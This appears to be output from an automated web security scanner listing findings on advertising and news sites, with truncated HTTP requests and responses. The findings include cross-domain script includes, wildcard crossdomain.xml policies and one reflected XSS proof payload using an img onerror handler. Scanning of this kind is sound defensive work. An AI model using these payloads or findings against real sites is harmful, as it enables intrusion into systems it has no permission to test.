HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 914 Date: Sat, 17 Sep 2011 16:29:27 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 914 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <body class="sponsored-by60959"style="x:expression ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 1008 Date: Sat, 17 Sep 2011 16:31:23 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 1008 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 921 Date: Sat, 17 Sep 2011 16:31:24 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 1014 Date: Sat, 17 Sep 2011 16:30:37 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 1014 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 921 Date: Sat, 17 Sep 2011 16:30:37 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 1008 Date: Sat, 17 Sep 2011 16:30:18 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 1008 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 921 Date: Sat, 17 Sep 2011 16:30:19 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 1008 Date: Sat, 17 Sep 2011 16:29:40 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 1008 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 921 Date: Sat, 17 Sep 2011 16:29:42 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 1008 Date: Sat, 17 Sep 2011 16:29:59 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 1008 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 921 Date: Sat, 17 Sep 2011 16:30:01 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.local.com |
Path: | /dart/ |
GET /dart/?ag=True&css Host: www.local.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=44c9c39a-4272-427f |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 948 Date: Sat, 17 Sep 2011 16:31:05 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 948 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <style type="text/css"> * { margin: 0px; padding: 0px; ...[SNIP]... <script language="JavaScript" src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.networkad |
Path: | /managing/optout_results |
POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... optThis=63&optThis=64 |
HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:43:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:43:14 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <img src='http://info.yahoo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.stamforda |
Path: | /widgets/widget |
GET /widgets/widgetc8b07<img%20src%3da Host: www.stamfordadvocate Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Sat, 17 Sep 2011 16:12:41 GMT Content-Type: text/html;charset=utf-8 Connection: keep-alive Content-Length: 79 Could not find the template: widgetc8b07<img src=a onerror=alert(1) |
Severity: | Low |
Confidence: | Certain |
Host: | http://adnxs.revsci.net |
Path: | /imp |
GET /imp?Z=728x90&s=937499&r Host: adnxs.revsci.net Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=optout |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:26:59 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:26:59 GMT Content-Length: 504 document.write('<scr'+ ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://pixel.adsafep |
Path: | /jspix |
GET /jspix?anId=144&pubId Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DB149A370 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:23:48 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://www.google.com adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafe reqquery : "anId=144&pubId=24537 debug : "false", allowPhoneHome : "true", phoneHomeDelay : "3000 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13676 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_4' src='http://nai.ad.us-ec ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:59 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13676 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_5' src='http://nai.adserver ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:24:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13676 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_6' src='http://nai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:24:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13678 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_7' src='http://nai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:34 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13677 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_1' src='http://nai.adsonar ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13678 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_3' src='http://nai.adtech.de ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:28 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13676 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_0' src='http://nai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:24:17 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13677 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_8' src='http://nai.glb ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:23:40 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13676 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <iframe id='frame_2' src='http://nai.tacoda.at ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://contextweb.pixel |
Path: | /context_sync |
GET /context_sync?call_type Host: contextweb.pixel User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://bh.contextweb.com Cookie: segments_p1="eJzjYuFo |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:05:14 GMT Pragma: no-cache Content-Type: text/html P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 194 Connection: close Server: Jetty(7.3.1.v20110307) <html><body><img width="0" height="0" src="http://bh.contextweb |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.skimresources |
Path: | /api/ |
GET /api/?callback=skiml Host: r.skimresources.com Proxy-Connection: keep-alive Referer: http://ellegirl.elle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: skimGUID=6143baaf427 |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Sat, 17 Sep 2011 16:52:11 GMT Server: Apache Vary: Accept-Encoding X-Powered-By: PHP/5.3.6 X-SKIM-Hostname: api08 Content-Length: 176 Connection: keep-alive skimlinksApplyHandlers({ |
Severity: | High |
Confidence: | Certain |
Host: | |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: |
HTTP/1.0 200 OK Pragma: no-cache Content-Length: 187 Server: FlashCom/4.0.3 Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy> <allow-access-from domain="*"/> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://33across.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 33across.com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:44:36 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 17:37:23 GMT Accept-Ranges: bytes Content-Length: 211 Cache-Control: max-age=1209600, proxy-revalidate Expires: Sat, 01 Oct 2011 16:44:36 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-doma ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.collective-media.net |
HTTP/1.0 200 OK Server: nginx/1.0.5 Content-Type: text/plain Content-Length: 187 Last-Modified: Wed, 07 Sep 2011 14:07:19 GMT Accept-Ranges: bytes Date: Sat, 17 Sep 2011 16:23:39 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.netmng.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.netmng.com |
